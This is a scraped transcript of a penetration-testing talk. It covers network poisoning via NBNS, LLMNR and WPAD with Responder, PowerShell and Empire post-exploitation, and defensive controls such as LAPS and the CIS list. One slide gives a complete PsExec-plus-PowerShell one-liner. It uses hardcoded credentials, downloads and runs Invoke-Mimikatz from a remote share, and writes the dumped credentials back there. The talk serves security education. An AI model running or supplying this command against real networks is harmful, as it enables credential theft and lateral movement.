Download presentation
Presentation is loading. Please wait.
Published byRudolph Powell Modified over 8 years ago
1
Common Network Penetration Testing Techniques Russel Van Tuyl
2
Security Analyst TN Air National Guard SANS MSISE Student Father of 2, Husband to 1 Russel.VanTuyl@gmail.com Russel C. Van Tuyl | Security Analyst | Sword & Shield Enterprise Security 1431 Centerpoint Blvd., Suite 150 | Knoxville, TN 37932 P: 865-244-3568 | M: 865-214-0579 | rcvt@sses.net
3
This is how I hack!
4
External Network (Web) Apps Internal Network Social Engineering Wireless Physical Hack All The Things
5
Recon/Intel Gathering Vulnerability Identification/Analysis Exploitation Post Exploitation Reporting (boo) Methodology
7
Phishing
10
Social Engineering - Pretext
11
External Assessment
12
Internal Assessment
13
How I see networks
14
Broadcast Messages Go to every host on the subnet Typically in search of a resource (like name resolution) Common Windows Broadcast Protocols NetBIOS RFC 1001 & 1002 LLMNR RFC 4795 244.0.0.252 (Link Scope Multicast) Types Windows Redirector File Server Print Server WPAD
15
NetBIOS Name Service (NBNS) Broadcast Messages
16
Link-Local Multicast Name Resolution (LLMNR) Multicast Messages
17
Web Proxy Autodiscovery Protocol (WPAD) Standard Internet Engineering Task Force (IETF) draft http://tools.ietf.org/html/draft-ietf-wrec-wpad-01 Expired December 1999 Discovery DHCP DNS Proxy Auto-Config (PAC) wpad.dat http://findproxyforurl.com
19
Responder by Laurent Gaffie @pythonresponder Trustwave SpiderLabs https://github.com/SpiderLabs/Responder
21
runas.exe
23
Windows PowerShell is an interactive object-oriented command environment with scripting language features that utilizes small programs called cmdlets to simplify configuration, administration, and management of heterogeneous environments in both standalone and networked typologies by utilizing standards-based remoting protocols.
24
powershell.exe Built on.NET Framework Verb-Noun Tab Complete Alias Structured Data/Objects Syntax Highlighting (version 5) Released in 2006 on XP*/Vista/Server 2003.ps1 Modules.psm1 Integrated Scripting Environment (ISE)
25
Download Cradle
30
ForEach ($h in Get-Content C:\hosts.txt){C:\PsExec.exe \\$h -d -e -u ACME\bob -p P@$$word1 -s cmd /c powershell -nop -command “& {IEX ((new-object net.webclient).downloadstring(‘\\172.16.1.205\data\Invoke- Mimikatz.ps1′));Invoke-Mimikatz -DumpCreds > \\172.16.1.205\data\%COMPUTERNAME%.txt}”}
32
questions?
33
Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire
34
Sensitive Data Image removed for distribution
35
Strong Passwords Password Database Local Admin Disable & Rename Implement LAPS https://support.microsoft.com/en-us/kb/3062591 Credential Theft Protected LSASS Privileged Access Workstations (PAWS) https://technet.microsoft.com/en-us/library/mt634654.aspx Least Privilege Logging Powershell v5 http://www.malwarearchaeology.com/log-md/ Monitor & restrict egress
36
Center for Internet Security (CIS) Critical Security Controls https://www.cisecurity.org/critical-controls.cfm CSC 1: Inventory of Authorized and Unauthorized Devices CSC 2: Inventory of Authorized and Unauthorized Software CSC 3: Secure Configurations for Hardware and Software on Mobile Devices, Laptops, Workstations, and Servers CSC 4: Continuous Vulnerability Assessment and Remediation CSC 5: Controlled Use of Administrative Privileges CSC 6: Maintenance, Monitoring, and Analysis of Audit Logs CSC 7: Email and Web Browser Protections CSC 8: Malware Defenses CSC 9: Limitation and Control of Network Ports, Protocols, and Services CSC 10: Data Recovery Capability CSC 11: Secure Configurations for Network Devices such as Firewalls, Routers, and Switches CSC 12: Boundary Defense CSC 13: Data Protection CSC 14: Controlled Access Based on the Need to Know CSC 15: Wireless Access Control CSC 16: Account Monitoring and Control CSC 17: Security Skills Assessment and Appropriate Training to Fill Gaps CSC 18: Application Software Security CSC 19: Incident Response and Management CSC 20: Penetration Tests and Red Team Exercises
37
1.Don’t patch anything 2.Don’t harden servers 3.Use default/weak passwords, in multiple places 4.Use shared accounts/passwords 5.Use poorly written applications 6.Allow unrestricted inbound traffic 7.Allow unrestricted outbound traffic 8.Use the highest possible privilege levels 9.Put everything on the Internet (bcuz YOLO!) 10. Assume everything is OK How To Get Owned in 10 Easy Steps
38
Questions?
Similar presentations
© 2025 SlidePlayer.com. Inc.
All rights reserved.